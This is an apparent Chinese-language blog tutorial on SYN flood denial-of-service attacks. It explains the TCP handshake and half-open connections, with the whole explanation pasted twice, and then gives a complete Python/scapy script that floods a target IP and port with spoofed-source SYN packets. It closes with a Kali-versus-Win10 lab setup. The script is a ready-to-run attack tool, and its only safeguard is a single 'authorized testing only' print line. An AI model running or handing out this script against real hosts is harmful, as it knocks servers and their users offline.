python实现synflood攻击

SYN Flood攻击原理

syn-flood(syn洪水)是种典型的DoS (Denial of Service，拒绝服务) 攻击。效果就是服务器TCP连接资源耗尽，停止响应正常的TCP连接请求。

假设连接发起方是A，连接接受方是B，即B在某个端口（Port）上监听A发出的连接请求。如下图所示，左边是A，右边是B。

SYN Flood攻击原理

syn-flood(syn洪水)是种典型的DoS (Denial of Service，拒绝服务) 攻击。效果就是服务器TCP连接资源耗尽，停止响应正常的TCP连接请求。

假设连接发起方是A，连接接受方是B，即B在某个端口（Port）上监听A发出的连接请求。如下图所示，左边是A，右边是B。

A首先发送SYN（Synchronization）消息给B，要求B做好接收数据的准备；B收到后反馈SYN-ACK（Synchronization-Acknowledgement） 消息给A。

这个消息的目的有两个：

1. 向A确认已做好接收数据的准备
2. 同时要求A也做好接收数据的准备

此时B已向A确认好接收状态，并等待A的确认，连接处于半开状态（Half-Open），顾名思义只开了一半；A收到后再次发送ACK(Acknowledgement)消息给B，向B确认也做好了接收数据的准备，至此三次握手完成，“连接”就建立了，实际上只是双方都按对方的要求进入了可以接收消息的状态。以上彼此要求对方确认的“状态”主要是双方将要使用的消息序号(SequenceNum)，TCP为保证消息按发送顺序抵达接收方的上层应用，需要用消息序号来标记消息的发送先后顺序的。

TCP是“双工”(Duplex)连接，同时支持双向通信，也就是双方同时可向对方发送消息，其中SYN和SYN-ACK消息开启了A→B的单向通信通道（B获知了A的消息序号）；SYN-ACK和ACK消息开启了B→A单向通信通道（A获知了B的消息序号）。

以上讨论的是在双方诚实可信，网络正常的理想状况下建立连接。但实际情况是，网络可能不稳定会丢包，使握手消息不能抵达对方，也可能是对方故意不按规矩来，故意延迟或不发送握手确认消息。假设B通过某TCP端口提供服务，B在收到A的SYN消息时，积极的反馈了SYN-ACK消息，使连接进入半开状态，因为B不确定自己发给A的SYN-ACK消息或A反馈的ACK消息是否会丢在半路，所以会给每个待完成的半开连接都设一个Timer，如果超过时间还没有收到A的ACK消息，则重新发送一次SYN-ACK消息给A，直到重试超过一定次数时才会放弃。

A首先发送SYN（Synchronization）消息给B，要求B做好接收数据的准备；B收到后反馈SYN-ACK（Synchronization-Acknowledgement） 消息给A。

这个消息的目的有两个：

1. 向A确认已做好接收数据的准备
2. 同时要求A也做好接收数据的准备

此时B已向A确认好接收状态，并等待A的确认，连接处于半开状态（Half-Open），顾名思义只开了一半；A收到后再次发送ACK(Acknowledgement)消息给B，向B确认也做好了接收数据的准备，至此三次握手完成，“连接”就建立了，实际上只是双方都按对方的要求进入了可以接收消息的状态。以上彼此要求对方确认的“状态”主要是双方将要使用的消息序号(SequenceNum)，TCP为保证消息按发送顺序抵达接收方的上层应用，需要用消息序号来标记消息的发送先后顺序的。

TCP是“双工”(Duplex)连接，同时支持双向通信，也就是双方同时可向对方发送消息，其中SYN和SYN-ACK消息开启了A→B的单向通信通道（B获知了A的消息序号）；SYN-ACK和ACK消息开启了B→A单向通信通道（A获知了B的消息序号）。

以上讨论的是在双方诚实可信，网络正常的理想状况下建立连接。但实际情况是，网络可能不稳定会丢包，使握手消息不能抵达对方，也可能是对方故意不按规矩来，故意延迟或不发送握手确认消息。假设B通过某TCP端口提供服务，B在收到A的SYN消息时，积极的反馈了SYN-ACK消息，使连接进入半开状态，因为B不确定自己发给A的SYN-ACK消息或A反馈的ACK消息是否会丢在半路，所以会给每个待完成的半开连接都设一个Timer，如果超过时间还没有收到A的ACK消息，则重新发送一次SYN-ACK消息给A，直到重试超过一定次数时才会放弃。

使用python编写代码攻击：syn.py

#!/usr/bin/env python3 """ 绕过连接拒绝 """ import socket import random import struct import time import sys from scapy.all import IP, TCP, send def send_syn_flood(target_ip, target_port, duration=60): """发送SYN洪水攻击""" print(f"[*] 对 {target_ip}:{target_port} 发动SYN洪水攻击") print("[*] 按 Ctrl+C 停止") count = 0 start_time = time.time() try: while time.time() - start_time < duration: # 随机源IP和端口 src_ip = f"{random.randint(1,254)}.{random.randint(1,254)}." \ f"{random.randint(1,254)}.{random.randint(1,254)}" src_port = random.randint(1024, 65535) # 创建SYN包 ip_layer = IP(src=src_ip, dst=target_ip) tcp_layer = TCP(sport=src_port, dport=target_port, flags="S", seq=random.randint(0, 4294967295)) # 发送（无连接建立） send(ip_layer/tcp_layer, verbose=0) count += 1 # 显示进度 if count % 100 == 0: elapsed = time.time() - start_time print(f"[*] 已发送 {count} 个SYN包，速率: {count/elapsed:.1f} 包/秒") # 避免太快导致本地网络问题 time.sleep(0.001) except KeyboardInterrupt: print(f"\n[!] 用户停止攻击") elapsed = time.time() - start_time print(f"\n[+] 攻击统计:") print(f" 总数据包: {count}") print(f" 持续时间: {elapsed:.1f}秒") print(f" 平均速率: {count/elapsed:.1f}包/秒") return count > 0 if __name__ == "__main__": if len(sys.argv) < 3: print("用法: python syn_only.py <目标IP> <目标端口> [持续时间秒数]") sys.exit(1) target_ip = sys.argv[1] target_port = int(sys.argv[2]) duration = int(sys.argv[3]) if len(sys.argv) > 3 else 60 # 验证IP try: socket.inet_aton(target_ip) except: print(f"错误: 无效的IP地址: {target_ip}") sys.exit(1) # 检查scapy是否可用 try: from scapy.all import IP, TCP, send except ImportError: print("错误: 需要安装scapy库 (pip install scapy)") sys.exit(1) print("[*] 警告: 仅用于授权的安全测试！") result = send_syn_flood(target_ip, target_port, duration) if result: print("[+] 攻击可能已生效 - 目标可能已崩溃或防火墙已介入") else: print("[!] 攻击失败")

环境准备：kali和win10

攻击对象：win10，ip：192.168.136.136